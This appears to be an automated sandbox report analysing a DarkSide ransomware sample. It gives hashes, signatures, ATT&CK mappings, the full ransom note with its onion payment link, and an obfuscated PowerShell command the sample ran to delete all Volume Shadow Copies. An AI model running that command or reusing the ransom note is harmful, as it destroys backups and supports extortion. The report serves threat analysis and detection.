Analysis

  • max time kernel
    120s
  • max time network
    132s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    24-01-2022 00:30

General

  • Target

    5da3e6b4bea1eaceddb048a4a6bd702291189f42d15c4b2670de78984329b0a9.exe

  • Size

    59KB

  • MD5

    3d57934b0143b09e82092896580f90b0

  • SHA1

    ecfb2a7f8b9cc9878a447c6733b01276c13c5c6b

  • SHA256

    5da3e6b4bea1eaceddb048a4a6bd702291189f42d15c4b2670de78984329b0a9

  • SHA512

    0cfdb2c274b11697c875ccbf1943cb5cdee488018eada30408d7f7efc63d6d7df4e954e7239e71de8f8b082b7e9126255524e941e6620eeadf03b7c412b16882

Malware Config

Extracted

Path

C:\\README.82ee2099.TXT

Family

darkside

Ransom Note
----------- [ Welcome to DarkSide ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/VGBU8VAXXW7EYB5U4KQJXUGU5NT5FP8208W6UXVSKQDAE3CNBR4JTZQCXEZFZWF2 When you open our website, put the following data in the input form: Key: sWzBJoqqzL4Zn2RW3HUX03kMJd3SWd7m4wOpd3qUa7eex62poH0PPw7q8ONVepO7dEN6e5RAd7rcv5gHKhPV1uhNsHoV924TIKvNciRU1S0rZhklOZB2E3fcb6WquR9dJAbdA7WTO3bEaNproivkWdrzaYiIpn006YgPHpQbAPGJP7hiVtD8SBKSoie2u3ErPSC51J4jVLOqDj1nqdGnZjZGHyKE092eobTQ1AVRz6xa93AFD6YzLs8D5M1ixHXr6p3ft5xplmULrkaOCnSLMPolSLDUYYoSK37JhGkr4yPVRxwFTCuG8jUe83t2q19AZM9lcqC4Vly1Yyhhu4EHwk2S3AEJp27xrv0Ba4qlNY1P8tFdoh8yG4HSPX7qBMJ3Twk2NSSBzx4wV07gFVw4jSn1E5GF4y0OSz71wszVEolQWnM6MMCwoBPBCFEnSN4ehk1AKlR8QqjLXR9Qn2t0BHt3iUssq3uAq5JY4O8M9ZHw2bXlULA9hzxIlOYJtw5zuMqi8rvzMRmx5IRGKKorl4MPDpEyOr2fg5rMjn4axW6IKvxN3XecwB4 !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!
URLs

http://darksidfqzcuhtk2.onion/VGBU8VAXXW7EYB5U4KQJXUGU5NT5FP8208W6UXVSKQDAE3CNBR4JTZQCXEZFZWF2

Signatures

  • DarkSide

    Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.

  • Modifies extensions of user files 12 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
  • Modifies Control Panel 1 IoCs
  • Modifies registry class 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 25 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\5da3e6b4bea1eaceddb048a4a6bd702291189f42d15c4b2670de78984329b0a9.exe
    "C:\Users\Admin\AppData\Local\Temp\5da3e6b4bea1eaceddb048a4a6bd702291189f42d15c4b2670de78984329b0a9.exe"
    1⤵
    • Modifies extensions of user files
    • Sets desktop wallpaper using registry
    • Modifies Control Panel
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2660
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3584
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2968

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

1
T1112

Credential Access

Credentials in Files

1
T1081

Collection

Data from Local System

1
T1005

Impact

Defacement

1
T1491

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    MD5

    ea6243fdb2bfcca2211884b0a21a0afc

    SHA1

    2eee5232ca6acc33c3e7de03900e890f4adf0f2f

    SHA256

    5bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8

    SHA512

    189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    MD5

    d57bbc7f42713cee773c2c32916abc3b

    SHA1

    7a6822690f123e36b9d508d304ab0af8041936b8

    SHA256

    bbe863eb6ab87d1feea8da89f437fcaf0c48b85dbbf282be7471a34be1587fdd

    SHA512

    c5e233e1a0a76937f644a68bfd7461418c8777931dec09583ff9b1f8cd80fd3885e439e878b05b7d65ff3162fc79e92d4b8e07e139c823a714e5b99343fc155c

  • memory/3584-123-0x00000165EBEA0000-0x00000165EBEC2000-memory.dmp
    Filesize

    136KB

  • memory/3584-128-0x00000165EE290000-0x00000165EE306000-memory.dmp
    Filesize

    472KB

  • memory/3584-140-0x00000165EBE03000-0x00000165EBE05000-memory.dmp
    Filesize

    8KB

  • memory/3584-139-0x00000165EBE00000-0x00000165EBE02000-memory.dmp
    Filesize

    8KB

  • memory/3584-141-0x00000165EBE06000-0x00000165EBE08000-memory.dmp
    Filesize

    8KB